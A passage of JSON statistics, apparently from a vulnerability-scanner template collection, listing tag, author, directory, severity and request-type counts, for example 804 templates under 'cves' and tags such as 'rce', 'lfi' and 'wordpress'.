sitecore","count":2},{"name":"couchdb","count":2},{"name":"avantfax","count":2},{"name":"middleware","count":2},{"name":"chyrp","count":2},{"name":"natshell","count":2},{"name":"liferay","count":2},{"name":"vrealize","count":2},{"name":"globalprotect","count":2},{"name":"splunk","count":2},{"name":"aruba","count":2},{"name":"igs","count":2},{"name":"nextjs","count":2},{"name":"linux","count":2},{"name":"odoo","count":2},{"name":"geowebserver","count":2},{"name":"chiyu","count":2},{"name":"github","count":2},{"name":"commax","count":2},{"name":"bypass","count":2},{"name":"plesk","count":2},{"name":"prtg","count":2},{"name":"rockmongo","count":2},{"name":"netis","count":2},{"name":"tidb","count":2},{"name":"pega","count":2},{"name":"nagios","count":2},{"name":"favicon","count":2},{"name":"jsf","count":2},{"name":"wordfence","count":2},{"name":"guacamole","count":2},{"name":"hostheader-injection","count":2},{"name":"qcubed","count":2},{"name":"waf","count":2},{"name":"keycloak","count":2},{"name":"ecoa","count":2},{"name":"aviatrix","count":2},{"name":"sonarqube","count":2},{"name":"huawei","count":2},{"name":"prestashop","count":2},{"name":"mcafee","count":2},{"name":"hjtcloud","count":2},{"name":"enumeration","count":2},{"name":"phpcollab","count":2},{"name":"glassfish","count":2},{"name":"emerge","count":2},{"name":"payara","count":2},{"name":"webcam","count":2},{"name":"cve2005","count":2},{"name":"getsimple","count":2},{"name":"ucmdb","count":2},{"name":"voipmonitor","count":2},{"name":"grav","count":2},{"name":"bucket","count":2},{"name":"saltstack","count":2},{"name":"status","count":2},{"name":"jeedom","count":2},{"name":"showdoc","count":2},{"name":"smb","count":2},{"name":"sharepoint","count":2},{"name":"dolibarr","count":2},{"name":"db","count":2},{"name":"hpe","count":2},{"name":"openfire","count":2},{"name":"trixbox","count":2},{"name":"hashicorp","count":2},{"name":"openvpn","count":2},{"name":"cache","count":2},{"name":"kentico","count":2},{"name":"idrac","count":2},{"name":"leak","count":2},{"name":"minio","count":2},{"name":"fortios","count":2},{"name":"activemq","count":2},{"name":"ec2","count":2},{"name":"totemomail","count":2},{"name":"maian","count":2},{"name":"service","count":2},{"name":"akkadian","count":2},{"name":"kong","count":2},{"name":"hasura","count":2},{"name":"sonicwall","count":2},{"name":"chamilo","count":2},{"name":"upload","count":2},{"name":"adminer","count":2},{"name":"jboss","count":2},{"name":"axis","count":2},{"name":"xxljob","count":2},{"name":"akamai","count":2},{"name":"nextcloud","count":2},{"name":"frp","count":2},{"name":"oauth","count":2},{"name":"bruteforce","count":2},{"name":"shellshock","count":2},{"name":"harbor","count":2},{"name":"rstudio","count":2},{"name":"icewarp","count":2},{"name":"yii","count":2},{"name":"ecology","count":2},{"name":"flir","count":2},{"name":"spark","count":2},{"name":"node","count":2},{"name":"netsweeper","count":2},{"name":"paloalto","count":2},{"name":"storage","count":2},{"name":"horde","count":2},{"name":"vcenter","count":2},{"name":"webadmin","count":1},{"name":"flink","count":1},{"name":"kindeditor","count":1},{"name":"sidekiq","count":1},{"name":"opensns","count":1},{"name":"werkzeug","count":1},{"name":"timeclock","count":1},{"name":"postmessage","count":1},{"name":"razor","count":1},{"name":"argussurveillance","count":1},{"name":"skywalking","count":1},{"name":"karel","count":1},{"name":"kyan","count":1},{"name":"gilacms","count":1},{"name":"zenario","count":1},{"name":"parentlink","count":1},{"name":"rocketchat","count":1},{"name":"mysql","count":1},{"name":"sentry","count":1},{"name":"ghost","count":1},{"name":"opensmtpd","count":1},{"name":"idemia","count":1},{"name":"nsasg","count":1},{"name":"dnssec","count":1},{"name":"jenzabar","count":1},{"name":"nimble","count":1},{"name":"arl","count":1},{"name":"fastcgi","count":1},{"name":"grails","count":1},{"name":"shopxo","count":1},{"name":"rdp","count":1},{"name":"sar2html","count":1},{"name":"etouch","count":1},{"name":"adb","count":1},{"name":"portainer","count":1},{"name":"saltapi","count":1},{"name":"gateone","count":1},{"name":"comodo","count":1},{"name":"cve2006","count":1},{"name":"frontpage","count":1},{"name":"myvuehelp","count":1},{"name":"daybyday","count":1},{"name":"mediumish","count":1},{"name":"swagger","count":1},{"name":"uwsgi","count":1},{"name":"accela","count":1},{"name":"novnc","count":1},{"name":"sangfor","count":1},{"name":"wooyun","count":1},{"name":"xiuno","count":1},{"name":"pihole","count":1},{"name":"wamp","count":1},{"name":"ntopng","count":1},{"name":"gurock","count":1},{"name":"fortilogger","count":1},{"name":"maxsite","count":1},{"name":"vnc","count":1},{"name":"viewpoint","count":1},{"name":"landrayoa","count":1},{"name":"metabase","count":1},{"name":"moinmoin","count":1},{"name":"tongda","count":1},{"name":"acexy","count":1},{"name":"natemail","count":1},{"name":"woocommerce","count":1},{"name":"klog","count":1},{"name":"huijietong","count":1},{"name":"email","count":1},{"name":"solman","count":1},{"name":"lancom","count":1},{"name":"camunda","count":1},{"name":"wiki","count":1},{"name":"beanstalk","count":1},{"name":"weiphp","count":1},{"name":"websvn","count":1},{"name":"phalcon","count":1},{"name":"kubeflow","count":1},{"name":"twitter-server","count":1},{"name":"netgenie","count":1},{"name":"xampp","count":1},{"name":"shopizer","count":1},{"name":"sgp","count":1},{"name":"tieline","count":1},{"name":"spectracom","count":1},{"name":"qdpm","count":1},{"name":"empirecms","count":1},{"name":"jeewms","count":1},{"name":"phpfusion","count":1},{"name":"aspnuke","count":1},{"name":"panos","count":1},{"name":"ssl","count":1},{"name":"mongo","count":1},{"name":"servicedesk","count":1},{"name":"rockethchat","count":1},{"name":"csrfguard","count":1},{"name":"cobub","count":1},{"name":"nifi","count":1},{"name":"netmask","count":1},{"name":"zeroshell","count":1},{"name":"zmanda","count":1},{"name":"varnish","count":1},{"name":"fedora","count":1},{"name":"cgi","count":1},{"name":"okta","count":1},{"name":"soar","count":1},{"name":"dom","count":1},{"name":"cofax","count":1},{"name":"st","count":1},{"name":"spip","count":1},{"name":"zarafa","count":1},{"name":"bolt","count":1},{"name":"nweb2fax","count":1},{"name":"avalanche","count":1},{"name":"embedthis","count":1},{"name":"cockpit","count":1},{"name":"openemr","count":1},{"name":"goahead","count":1},{"name":"chevereto","count":1},{"name":"totaljs","count":1},{"name":"cerebro","count":1},{"name":"triconsole","count":1},{"name":"jsp","count":1},{"name":"gstorage","count":1},{"name":"nedi","count":1},{"name":"lotus","count":1},{"name":"alertmanager","count":1},{"name":"tcexam","count":1},{"name":"resourcespace","count":1},{"name":"zzzcms","count":1},{"name":"smi","count":1},{"name":"checkpoint","count":1},{"name":"beanshell","count":1},{"name":"alerta","count":1},{"name":"motorola","count":1},{"name":"jfrog","count":1},{"name":"springframework","count":1},{"name":"terraform","count":1},{"name":"smartsense","count":1},{"name":"ssltls","count":1},{"name":"solarlog","count":1},{"name":"tapestry","count":1},{"name":"graphite","count":1},{"name":"stem","count":1},{"name":"artica","count":1},{"name":"sophos","count":1},{"name":"openstack","count":1},{"name":"duomicms","count":1},{"name":"ueditor","count":1},{"name":"meraki","count":1},{"name":"pagespeed","count":1},{"name":"perl","count":1},{"name":"synnefo","count":1},{"name":"tjws","count":1},{"name":"pulsesecure","count":1},{"name":"clickhouse","count":1},{"name":"scs","count":1},{"name":"clockwork","count":1},{"name":"shopware","count":1},{"name":"office365","count":1},{"name":"codemeter","count":1},{"name":"fuelcms","count":1},{"name":"zm","count":1},{"name":"owasp","count":1},{"name":"krweb","count":1},{"name":"thinkadmin","count":1},{"name":"blind","count":1},{"name":"circontrol","count":1},{"name":"zyxel","count":1},{"name":"yealink","count":1},{"name":"fortigates","count":1},{"name":"yzmcms","count":1},{"name":"openx","count":1},{"name":"optiLink","count":1},{"name":"rsyncd","count":1},{"name":"darkstat","count":1},{"name":"maccmsv10","count":1},{"name":"simplecrm","count":1},{"name":"mpsec","count":1},{"name":"alibaba","count":1},{"name":"esmtp","count":1},{"name":" default-login","count":1},{"name":"extractor","count":1},{"name":"csod","count":1},{"name":"pacsone","count":1},{"name":"scimono","count":1},{"name":"zte","count":1},{"name":"zend","count":1},{"name":"tensorflow","count":1},{"name":"elasticsearch","count":1},{"name":"concrete","count":1},{"name":"listserv","count":1},{"name":"discord","count":1},{"name":"iceflow","count":1},{"name":"tectuus","count":1},{"name":"dvr","count":1},{"name":"apiman","count":1},{"name":"ganglia","count":1},{"name":"blue-ocean","count":1},{"name":"miscrsoft","count":1},{"name":"rmi","count":1},{"name":"plastic","count":1},{"name":"owa","count":1},{"name":"wildfly","count":1},{"name":"appweb","count":1},{"name":"cloudron","count":1},{"name":"apos","count":1},{"name":"qvisdvr","count":1},{"name":"gitea","count":1},{"name":"fiori","count":1},{"name":"sage","count":1},{"name":"crm","count":1},{"name":"wazuh","count":1},{"name":"clink-office","count":1},{"name":"jitsi","count":1},{"name":"wavemaker","count":1},{"name":"floc","count":1},{"name":"tracer","count":1},{"name":"announcekit","count":1},{"name":"hiawatha","count":1},{"name":"phpinfo","count":1},{"name":"omi","count":1},{"name":"commscope","count":1},{"name":"majordomo2","count":1},{"name":"websphere","count":1},{"name":"magicflow","count":1},{"name":"ns","count":1},{"name":"bookstack","count":1},{"name":"basic-auth","count":1},{"name":"upnp","count":1},{"name":"spf","count":1},{"name":"vsftpd","count":1},{"name":"yachtcontrol","count":1},{"name":"trilithic","count":1},{"name":"sprintful","count":1},{"name":"redhat","count":1},{"name":"dvwa","count":1},{"name":"javamelody","count":1},{"name":"emby","count":1},{"name":"jenkin","count":1},{"name":"heroku","count":1},{"name":"dotnetnuke","count":1},{"name":"rhymix","count":1},{"name":"xdcms","count":1},{"name":"asus","count":1},{"name":"lutron","count":1},{"name":"avtech","count":1},{"name":"k8","count":1},{"name":"wavlink","count":1},{"name":"trane","count":1},{"name":"traefik","count":1},{"name":"tenda","count":1},{"name":"mariadb","count":1},{"name":"tamronos","count":1},{"name":"pyramid","count":1},{"name":"expn","count":1},{"name":"s3","count":1},{"name":"jmx","count":1},{"name":"mrtg","count":1},{"name":"webui","count":1},{"name":"zookeeper","count":1},{"name":"haproxy","count":1},{"name":"dotnet","count":1},{"name":"oidc","count":1},{"name":"logontracer","count":1},{"name":"octoprint","count":1},{"name":"cors","count":1},{"name":"sarg","count":1},{"name":"phpshowtime","count":1},{"name":"wondercms","count":1},{"name":"tileserver","count":1},{"name":"mantisbt","count":1},{"name":"achecker","count":1},{"name":"dompdf","count":1},{"name":"linksys","count":1},{"name":"smartblog","count":1},{"name":"sco","count":1},{"name":"mobileiron","count":1},{"name":"nette","count":1},{"name":"kafdrop","count":1},{"name":"acontent","count":1},{"name":"emc","count":1},{"name":"vscode","count":1},{"name":"spidercontrol","count":1},{"name":"expose","count":1},{"name":"panabit","count":1},{"name":"metinfo","count":1},{"name":"clusterengine","count":1},{"name":"mantis","count":1},{"name":"mara","count":1},{"name":"centos","count":1},{"name":"openerp","count":1},{"name":"phpwiki","count":1},{"name":"ecom","count":1},{"name":"feifeicms","count":1},{"name":"luftguitar","count":1},{"name":"fortiweb","count":1},{"name":"olivetti","count":1},{"name":"rujjie","count":1},{"name":"k8s","count":1},{"name":"exacqvision","count":1},{"name":"labtech","count":1},{"name":"acme","count":1},{"name":"anchorcms","count":1},{"name":"episerver","count":1},{"name":"mirai","count":1},{"name":"kerbynet","count":1},{"name":"octobercms","count":1},{"name":"exposures","count":1},{"name":"dbeaver","count":1},{"name":"addpac","count":1},{"name":"robomongo","count":1},{"name":"cloudinary","count":1},{"name":"plc","count":1},{"name":"zcms","count":1},{"name":"pmb","count":1},{"name":"redis","count":1},{"name":"nuuo","count":1},{"name":"htmli","count":1},{"name":"oscommerce","count":1},{"name":"webmin","count":1},{"name":"starttls","count":1},{"name":"graylog","count":1},{"name":"gitlist","count":1},{"name":"xvr","count":1},{"name":"opm","count":1},{"name":"gotmls","count":1},{"name":"subrion","count":1},{"name":"nomad","count":1},{"name":"vidyo","count":1},{"name":"bigbluebutton","count":1},{"name":"api-manager","count":1},{"name":"imap","count":1},{"name":"domxss","count":1},{"name":"whm","count":1},{"name":"processmaker","count":1},{"name":"default","count":1},{"name":"eg","count":1},{"name":"sourcebans","count":1},{"name":"pgadmin","count":1},{"name":"nuxeo","count":1},{"name":"jnoj","count":1},{"name":"centreon","count":1},{"name":"tensorboard","count":1},{"name":"aura","count":1},{"name":"mailchimp","count":1},{"name":"svn","count":1},{"name":"xmlchart","count":1},{"name":"h3c-imc","count":1},{"name":"woocomernce","count":1},{"name":"visionhub","count":1},{"name":"cherokee","count":1},{"name":"postgres","count":1},{"name":"opentsdb","count":1},{"name":"ems","count":1},{"name":"fastapi","count":1},{"name":"nordex","count":1},{"name":"pippoint","count":1},{"name":"szhe","count":1},{"name":"iptime","count":1},{"name":"hadoop","count":1},{"name":"jquery","count":1},{"name":"cocoon","count":1},{"name":"selea","count":1},{"name":"calendarix","count":1},{"name":"gridx","count":1},{"name":"bullwark","count":1},{"name":"mdb","count":1},{"name":"netdata","count":1},{"name":"shiro","count":1},{"name":"webmodule-ee","count":1},{"name":"phpfastcache","count":1},{"name":"ruby","count":1},{"name":"expressjs","count":1},{"name":"nc2","count":1},{"name":"tpshop","count":1},{"name":"ognl","count":1},{"name":"bazarr","count":1},{"name":"b2evolution","count":1},{"name":"sureline","count":1},{"name":"glowroot","count":1},{"name":"ricoh","count":1},{"name":"azkaban","count":1},{"name":"rmc","count":1},{"name":"wmt","count":1},{"name":"cscart","count":1},{"name":"elascticsearch","count":1},{"name":"interlib","count":1},{"name":"graphql","count":1},{"name":"doh","count":1},{"name":"cyberoam","count":1},{"name":"finereport","count":1},{"name":"myucms","count":1},{"name":"javafaces","count":1},{"name":"fortinet","count":1},{"name":"influxdb","count":1},{"name":"plone","count":1},{"name":"actuator","count":1},{"name":"opencast","count":1},{"name":"fortigate","count":1},{"name":"primetek","count":1},{"name":"landray","count":1},{"name":"vsphere","count":1},{"name":"gogs","count":1},{"name":"lg-nas","count":1},{"name":"pcoip","count":1},{"name":"panasonic","count":1},{"name":"bedita","count":1},{"name":"faraday","count":1},{"name":"jaspersoft","count":1},{"name":"dotclear","count":1},{"name":"monitorix","count":1},{"name":"database","count":1},{"name":"burp","count":1},{"name":"webftp","count":1},{"name":"ilo4","count":1},{"name":"sceditor","count":1},{"name":"node-red-dashboard","count":1},{"name":"redmine","count":1},{"name":"froxlor","count":1},{"name":"lanproxy","count":1},{"name":"eyelock","count":1},{"name":"discourse","count":1},{"name":"javascript","count":1},{"name":"cloudflare","count":1},{"name":"clave","count":1},{"name":"xunchi","count":1},{"name":"sql","count":1},{"name":"ioncube","count":1},{"name":"wifisky","count":1},{"name":"lansweeper","count":1},{"name":"viewlinc","count":1},{"name":"zms","count":1},{"name":"circontrorl","count":1},{"name":"mautic","count":1},{"name":"biometrics","count":1},{"name":"74cms","count":1},{"name":"gloo","count":1},{"name":"eprints","count":1},{"name":"auth","count":1},{"name":"xml","count":1},{"name":"monitorr","count":1},{"name":"socomec","count":1},{"name":"openrestry","count":1},{"name":"realteo","count":1},{"name":"salesforce","count":1},{"name":"netrc","count":1},{"name":"svnserve","count":1},{"name":"testrail","count":1},{"name":"wing-ftp","count":1},{"name":"geddy","count":1},{"name":"codeigniter","count":1},{"name":"nexusdb","count":1},{"name":"redwood","count":1},{"name":"ulterius","count":1},{"name":"minimouse","count":1},{"name":"visualtools","count":1},{"name":"clockwatch","count":1},{"name":"craftcms","count":1},{"name":"qsan","count":1},{"name":"tika","count":1},{"name":"plugin","count":1},{"name":"turbocrm","count":1},{"name":"hortonworks","count":1},{"name":"couchbase","count":1},{"name":"bash","count":1},{"name":"blackboard","count":1},{"name":"cse","count":1},{"name":"moin","count":1},{"name":"bitly","count":1},{"name":"diris","count":1},{"name":"timesheet","count":1},{"name":"shoppable","count":1},{"name":"ewebs","count":1},{"name":"seacms","count":1},{"name":"gunicorn","count":1},{"name":"geutebruck","count":1},{"name":"proftpd","count":1},{"name":"sqlite","count":1},{"name":"hiboss","count":1},{"name":"erp-nc","count":1},{"name":"linkedin","count":1},{"name":"elfinder","count":1},{"name":"servicenow","count":1},{"name":"keenetic","count":1},{"name":"livezilla","count":1},{"name":"etherpad","count":1},{"name":"csrf","count":1},{"name":"exponentcms","count":1},{"name":"spring","count":1},{"name":"lotuscms","count":1},{"name":"rabbitmq","count":1},{"name":"memcached","count":1},{"name":"redcap","count":1},{"name":"mongoshake","count":1},{"name":"rubedo","count":1},{"name":"lighttpd","count":1},{"name":"powercreator","count":1},{"name":"drone","count":1},{"name":"tor","count":1},{"name":"shoretel","count":1},{"name":"phpunit","count":1},{"name":"eyou","count":1},{"name":"gsoap","count":1},{"name":"chinaunicom","count":1},{"name":"nps","count":1},{"name":"gespage","count":1},{"name":"ruckus","count":1},{"name":"ambari","count":1},{"name":"glances","count":1},{"name":"setup","count":1},{"name":"oneblog","count":1}],"authors":[{"name":"daffainfo","count":280},{"name":"pikpikcu","count":277},{"name":"dhiyaneshdk","count":268},{"name":"pdteam","count":199},{"name":"geeknik","count":154},{"name":"dwisiswant0","count":131},{"name":"gy741","count":77},{"name":"pussycat0x","count":70},{"name":"princechaddha","count":63},{"name":"madrobot","count":61},{"name":"0x_akoko","count":43},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":10},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"emadshanab","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"meme-lord","count":7},{"name":"dr_set","count":7},{"name":"oppsec","count":7},{"name":"0x240x23elu","count":7},{"name":"dogasantos","count":7},{"name":"pentest_swissky","count":6},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"iamnoooob","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":5},{"name":"lu4nx","count":5},{"name":"elsfa7110","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"nodauf","count":4},{"name":"xelkomy","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"dudez","count":3},{"name":"skeltavik","count":3},{"name":"johnk3r","count":3},{"name":"thomas_from_offensity","count":3},{"name":"shifacyclewala","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"incogbyte","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"sushantkamble","count":3},{"name":"unstabl3","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"binaryfigments","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"vsh00t","count":3},{"name":"jarijaas","count":3},{"name":"idealphase","count":3},{"name":"emenalf","count":3},{"name":"random-robbie","count":2},{"name":"0xcrypto","count":2},{"name":"mohammedsaneem","count":2},{"name":"0xprial","count":2},{"name":"bp0lr","count":2},{"name":"davidmckennirey","count":2},{"name":"kiblyn11","count":2},{"name":"gal nagli","count":2},{"name":"hetroublemakr","count":2},{"name":"manas_harsh","count":2},{"name":"ehsahil","count":2},{"name":"gevakun","count":2},{"name":"vavkamil","count":2},{"name":"hahwul","count":2},{"name":"bing0o","count":2},{"name":"x1m_martijn","count":2},{"name":"0xelkomy","count":2},{"name":"socketz","count":2},{"name":"dheerajmadhukar","count":2},{"name":"afaq","count":2},{"name":"bernardofsr","count":2},{"name":"bsysop","count":2},{"name":"arcc","count":2},{"name":"johnjhacking","count":2},{"name":"whoever","count":2},{"name":"foulenzer","count":2},{"name":"r3naissance","count":2},{"name":"0xsapra","count":2},{"name":"swissky","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"ree4pwn","count":2},{"name":"cocxanh","count":2},{"name":"0xsmiley","count":2},{"name":"zomsop82","count":2},{"name":"fabaff","count":2},{"name":"udit_thakkur","count":2},{"name":"huowuzhao","count":2},{"name":"0xrudra","count":2},{"name":"g4l1t0","count":2},{"name":"lotusdll","count":2},{"name":"alifathi-h1","count":2},{"name":"koti2","count":2},{"name":"moritz nentwig","count":2},{"name":"pxmme1337","count":2},{"name":"nkxxkn","count":2},{"name":"w4cky_","count":2},{"name":"parth","count":2},{"name":"convisoappsec","count":2},{"name":"joeldeleep","count":2},{"name":"randomrobbie","count":2},{"name":"amsda","count":2},{"name":"un-fmunozs","count":1},{"name":"udyz","count":1},{"name":"berkdusunur","count":1},{"name":"0h1in9e","count":1},{"name":"nerrorsec","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"regala_","count":1},{"name":"retr0","count":1},{"name":"b4uh0lz","count":1},{"name":"push4d","count":1},{"name":"taielab","count":1},{"name":"adrianmf","count":1},{"name":"d0rkerdevil","count":1},{"name":"defr0ggy","count":1},{"name":"deena","count":1},{"name":"zhenwarx","count":1},{"name":"knassar702","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"bolli95","count":1},{"name":"bad5ect0r","count":1},{"name":"whynotke","count":1},{"name":"streetofhackerr007","count":1},{"name":"alperenkesk","count":1},{"name":"_darrenmartyn","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"ooooooo_q","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ilovebinbash","count":1},{"name":"xstp","count":1},{"name":"geraldino2","count":1},{"name":"x6263","count":1},{"name":"willd96","count":1},{"name":"petruknisme","count":1},{"name":"mah3sec_","count":1},{"name":"s1r1u5_","count":1},{"name":"thezakman","count":1},{"name":"vzamanillo","count":1},{"name":"rojanrijal","count":1},{"name":"52971","count":1},{"name":"sec_hawk","count":1},{"name":"shifacyclewla","count":1},{"name":"co0nan","count":1},{"name":"hakluke","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"_harleo","count":1},{"name":"zandros0","count":1},{"name":"me9187","count":1},{"name":"becivells","count":1},{"name":"alex","count":1},{"name":"andirrahmani1","count":1},{"name":"pudsec","count":1},{"name":"0ut0fb4nd","count":1},{"name":"c3l3si4n","count":1},{"name":"ohlinge","count":1},{"name":"pdp","count":1},{"name":"yavolo","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"noamrathaus","count":1},{"name":"forgedhallpass","count":1},{"name":"naglinagli","count":1},{"name":"ajaysenr","count":1},{"name":"borna nematzadeh","count":1},{"name":"wabafet","count":1},{"name":"@dwisiswant0","count":1},{"name":"daviey","count":1},{"name":"rodnt","count":1},{"name":"kareemse1im","count":1},{"name":"luskabol","count":1},{"name":"affix","count":1},{"name":"elder tao","count":1},{"name":"shreyapohekar","count":1},{"name":"brabbit10","count":1},{"name":"mhdsamx","count":1},{"name":"gboddin","count":1},{"name":"qlkwej","count":1},{"name":"manuelbua","count":1},{"name":"ringo","count":1},{"name":"absshax","count":1},{"name":"furkansenan","count":1},{"name":"infosecsanyam","count":1},{"name":"fmunozs","count":1},{"name":"nytr0gen","count":1},{"name":"0xrod","count":1},{"name":"izn0u","count":1},{"name":"smaranchand","count":1},{"name":"notsoevilweasel","count":1},{"name":"flag007","count":1},{"name":"undefl0w","count":1},{"name":"hanlaomo","count":1},{"name":"cookiehanhoan","count":1},{"name":"shelld3v","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"tirtha_mandal","count":1},{"name":"toufik airane","count":1},{"name":"ahmed sherif","count":1},{"name":"sickwell","count":1},{"name":"sshell","count":1},{"name":"tim_koopmans","count":1},{"name":"sullo","count":1},{"name":"jteles","count":1},{"name":"alph4byt3","count":1},{"name":"b0yd","count":1},{"name":"ipanda","count":1},{"name":"its0x08","count":1},{"name":"remonsec","count":1},{"name":"sicksec","count":1},{"name":"exploitation","count":1},{"name":"j33n1k4","count":1},{"name":"omarkurt","count":1},{"name":"_c0wb0y_","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"fopina","count":1},{"name":"luci","count":1},{"name":"patralos","count":1},{"name":"blckraven","count":1},{"name":"kurohost","count":1},{"name":"intx0x80","count":1},{"name":"philippdelteil","count":1},{"name":"akash.c","count":1},{"name":"oscarintherocks","count":1},{"name":"mubassirpatel","count":1},{"name":"rotemreiss","count":1},{"name":"soyelmago","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"elmahdi","count":1},{"name":"yashgoti","count":1},{"name":"yashanand155","count":1},{"name":"0xtavian","count":1},{"name":"pratik khalane","count":1},{"name":"akshansh","count":1},{"name":"ahmetpergamum","count":1},{"name":"kre80r","count":1},{"name":"elouhi","count":1},{"name":"b0rn2r00t","count":1},{"name":"0xteles","count":1},{"name":"mesaglio","count":1},{"name":"ldionmarcil","count":1},{"name":"jeya seelan","count":1},{"name":"raesene","count":1},{"name":"revblock","count":1},{"name":"andysvints","count":1},{"name":"bjhulst","count":1},{"name":"th3.d1p4k","count":1},{"name":"chron0x","count":1},{"name":"evolutionsec","count":1},{"name":"juicypotato1","count":1},{"name":"divya_mudgal","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"kabirsuda","count":1},{"name":"dawid-czarnecki","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"aresx","count":1},{"name":"apt-mirror","count":1},{"name":"mass0ma","count":1},{"name":"makyotox","count":1},{"name":"micha3lb3n","count":1},{"name":"thevillagehacker","count":1},{"name":"schniggie","count":1},{"name":"iampritam","count":1},{"name":"sy3omda","count":1}],"directory":[{"name":"cves","count":804},{"name":"vulnerabilities","count":311},{"name":"exposed-panels","count":250},{"name":"technologies","count":200},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":37},{"name":"network","count":34},{"name":"iot","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":661},{"name":"high","count":621},{"name":"medium","count":463},{"name":"critical","count":275},{"name":"low","count":154}],"types":[{"name":"http","count":2068},{"name":"file","count":46},{"name":"network","count":43},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":814},{"name":"lfi","count":329},{"name":"panel","count":259},{"name":"xss","count":253},{"name":"wordpress","count":243},{"name":"exposure","count":237},{"name":"rce","count":202},{"name":"tech","count":193},{"name":"wp-plugin","count":168},{"name":"cve2020","count":164},{"name":"cve2021","count":147},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":87},{"name":"apache","count":71},{"name":"takeover","count":69},{"name":"iot","count":67},{"name":"token","count":66},{"name":"default-login","count":65},{"name":"token-spray","count":63},{"name":"oob","count":59},{"name":"cve2017","count":50},{"name":"file","count":48},{"name":"unauth","count":47},{"name":"network","count":43},{"name":"sqli","count":40},{"name":"ssrf","count":40},{"name":"cve2016","count":37},{"name":"","count":37},{"name":"oracle","count":36},{"name":"redirect","count":35},{"name":"logs","count":30},{"name":"google","count":29},{"name":"jira","count":28},{"name":"cve2014","count":27},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":26},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"disclosure","count":23},{"name":"misc","count":23},{"name":"cisco","count":22},{"name":"router","count":21},{"name":"misconfig","count":19},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"debug","count":18},{"name":"cve2012","count":18},{"name":"sap","count":18},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"cve2009","count":14},{"name":"struts","count":14},{"name":"aws","count":14},{"name":"fuzz","count":14},{"name":"login","count":14},{"name":"weblogic","count":14},{"name":"dns","count":13},{"name":"zoho","count":13},{"name":"devops","count":13},{"name":"adobe","count":13},{"name":"android","count":13},{"name":"dlink","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"wp-theme","count":11},{"name":"intrusive","count":10},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"vmware","count":9},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"ibm","count":8},{"name":"cnvd","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"scada","count":8},{"name":"cve2008","count":8},{"name":"backup","count":8},{"name":"ruijie","count":8},{"name":"microsoft","count":8},{"name":"nginx","count":8},{"name":"files","count":7},{"name":"coldfusion","count":7},{"name":"hp","count":7},{"name":"kubernetes","count":7},{"name":"netgear","count":7},{"name":"cms","count":7},{"name":"confluence","count":7},{"name":"solr","count":6},{"name":"laravel","count":6},{"name":"jetty","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"fileupload","count":6},{"name":"docker","count":6},{"name":"citrix","count":6},{"name":"nodejs","count":6},{"name":"django","count":6},{"name":"camera","count":6},{"name":"lucee","count":5},{"name":"ssti","count":5},{"name":"jolokia","count":5},{"name":"java","count":5},{"name":"drupal","count":5},{"name":"phpmyadmin","count":5},{"name":"printer","count":5},{"name":"circarlife","count":5},{"name":"deserialization","count":5},{"name":"crlf","count":5},{"name":"tomcat","count":5},{"name":"dedecms","count":5},{"name":"headless","count":5},{"name":"iis","count":5},{"name":"windows","count":5},{"name":"amazon","count":4},{"name":"wso2","count":4},{"name":"moodle","count":4},{"name":"exchange","count":4},{"name":"asp","count":4},{"name":"artifactory","count":4},{"name":"traversal","count":4},{"name":"webserver","count":4},{